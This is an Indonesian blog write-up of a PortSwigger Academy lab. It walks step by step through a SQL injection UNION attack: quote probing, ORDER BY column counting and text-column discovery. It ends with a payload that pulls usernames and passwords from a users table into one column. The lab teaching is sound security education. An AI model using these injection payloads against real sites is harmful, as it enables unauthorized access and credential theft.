Portswigger academy SQLi Lab: SQL injection UNION attack, retrieving multiple values in a single column

Februari 13, 2025

Portswigger academy SQLi Lab: SQL injection UNION attack, retrieving multiple values in a single column

Lab ini hampir sama dengan lab sebelumnya, hanya saja terdapat 1 kolom saja yang bisa mengembalikan nilai, sehinggaa username dan password dapat ditampilkan dalam 1 kolom.

Seperti biasa, cek kerentanan dengan tanda ' di url setelah parameter.

Menjadi seperti ini:

https://0a47004503efc01d80e2f3aa00ab009b.web-security-academy.net/filter?category=Gifts'

jika error brarti ada potensi rentan. Selanjutnya lakukan tahapan:

'order+by+1--

'order+by+2--

'order+by+3-- (eror di 3) Jumlah kolom 2.

'union+select+NULL,NULL--

'union+select+'a',NULL-- (error)

'union+select+NULL,'a'-- (bisa menampilkan nilai)

Jadi hanya kolom 2 yang bisa menampilkan nilai, gunakan kolom 2 untuk menampilkan username dan password.

Gunakan:

'+UNION+SELECT+NULL,username||'~'||password+FROM+users--

Kamu juga dapat menggunakan tanda pemisah lainnya seperti = atau lainnya.

Lalu akan muncul:

Selanjutnya gunakan untuk login.

Cari Blog Ini

Dunia Ethical Hacking

Portswigger academy SQLi Lab: SQL injection UNION attack, retrieving multiple values in a single column

Komentar

Posting Komentar

Postingan Populer

Cara Pivoting menggunakan Ligolo (eksternal ke internal)

Portswigger academy SQLi Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data